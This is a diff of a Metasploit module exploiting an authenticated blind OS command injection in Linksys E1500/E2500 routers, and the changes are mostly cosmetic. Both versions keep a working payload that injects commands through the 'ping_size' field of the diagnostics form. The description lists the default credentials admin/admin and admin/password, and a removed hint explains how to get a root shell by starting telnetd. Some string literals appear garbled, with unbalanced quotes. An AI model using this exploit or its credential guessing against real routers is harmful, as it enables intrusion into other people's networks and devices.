@@ -13,28 +13,23 @@ class Metasploit3 < Msf::Auxiliary
1313
1414 def initialize ( info = { } )
1515 super ( update_info ( info ,
16- 'Name' => 'Linksys E1500/E2500 Remote OS Command Execution' ,
16+ 'Name' => 'Linksys E1500/E2500 Remote Command Execution' ,
1717 'Description' => %q{
18- Some Linksys Routers are vulnerable to OS Command injection.
19- You will need credentials to the webinterface to access the vulnerable part
20- of the application. Default credentials are always a good starting point.
21- admin/admin or admin/password could be a first try.
22- Note: This is a blind os command injection vulnerability. This means that you will
23- not see any output of your command. Try a ping command to your local system for a
24- first test.
25-
26- Hint: To get a remote shell you could start telnetd and touch /etc/group. Use the
27- user root without a password for accessing the device.
18+ Some Linksys Routers are vulnerable to an authenticated OS command injection.
19+ Default credentials for the web interface are admin/admin or admin/password. Since
20+ it is a blind os command injection vulnerability, there is no output for the
21+ executed command. A ping command against a controlled system for can be used for
22+ testing purposes.
2823 } ,
2924 'Author' => [ 'm-1-k-3' ] ,
3025 'License' => MSF_LICENSE ,
3126 'References' =>
3227 [
33- [ 'URL' , 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ] ,
34- [ 'URL' , 'http://www.s3cur1ty.de/m1adv2013-004' ] ,
35- [ 'EDB' , '24475' ] ,
3628 [ 'OSVDB' , '89912' ] ,
37- [ 'BID' , '57760' ]
29+ [ 'BID' , '57760' ] ,
30+ [ 'EDB' , '24475' ] ,
31+ [ 'URL' , 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ] ,
32+ [ 'URL' , 'http://www.s3cur1ty.de/m1adv2013-004' ]
3833 ] ,
3934 'DisclosureDate' => 'Feb 05 2013' ) )
4035
@@ -54,14 +49,14 @@ def run
5449 print_status ( "#{ rhost } #{ rport } #{ user } #{ pass } )
5550
5651 begin
57- res = send_request_cgi ( {
58- 'uri' => uri ,
59- 'method' => 'GET' ,
60- 'authorization' => basic_auth ( user , pass )
61- } )
52+ res = send_request_cgi ( {
53+ 'uri' => uri ,
54+ 'method' => 'GET' ,
55+ 'authorization' => basic_auth ( user , pass )
56+ } )
6257
63- return if res . nil?
64- return if ( res . code == 404 )
58+ return if res . nil?
59+ return if ( res . code == 404 )
6560
6661 if [ 200 , 301 , 302 ] . include? ( res . code )
6762 print_good ( "#{ rhost } #{ rport } #{ user } #{ pass } )
@@ -71,11 +66,10 @@ def run
7166 end
7267
7368 rescue ::Rex ::ConnectionError
74- vprint_error ( "#{ rhost } #{ rport } )
75- return
69+ vprint_error ( "#{ rhost } #{ rport } )
70+ return
7671 end
7772
78-
7973 print_status ( "#{ rhost } #{ rport } + datastore [ 'CMD' ] )
8074
8175 cmd = datastore [ 'CMD' ]
@@ -85,23 +79,22 @@ def run
8579
8680 vprint_status ( "#{ rhost } #{ rport } #{ uri } )
8781 begin
88- res = send_request_cgi (
89- {
90- 'uri' => uri ,
91- 'method' => 'POST' ,
92- 'authorization' => basic_auth ( user , pass ) ,
93- 'vars_post' => {
94- "submit_button" => "Diagnostics" ,
95- "change_action" => "gozila_cgi" ,
96- "submit_type" => "start_ping" ,
97- "action" => "" ,
98- "commit" => "0" ,
99- "ping_ip" => "1.1.1.1" ,
100- "ping_size" => "&#{ cmd } ,
101- "ping_times" => "5" ,
102- "traceroute_ip" => ""
103- }
104- } )
82+ res = send_request_cgi ( {
83+ 'uri' => uri ,
84+ 'method' => 'POST' ,
85+ 'authorization' => basic_auth ( user , pass ) ,
86+ 'vars_post' => {
87+ "submit_button" => "Diagnostics" ,
88+ "change_action" => "gozila_cgi" ,
89+ "submit_type" => "start_ping" ,
90+ "action" => "" ,
91+ "commit" => "0" ,
92+ "ping_ip" => "1.1.1.1" ,
93+ "ping_size" => "&#{ cmd } ,
94+ "ping_times" => "5" ,
95+ "traceroute_ip" => ""
96+ }
97+ } )
10598 rescue ::Rex ::ConnectionError
10699 vprint_error ( "#{ rhost } #{ rport } )
107100 return
0 commit comments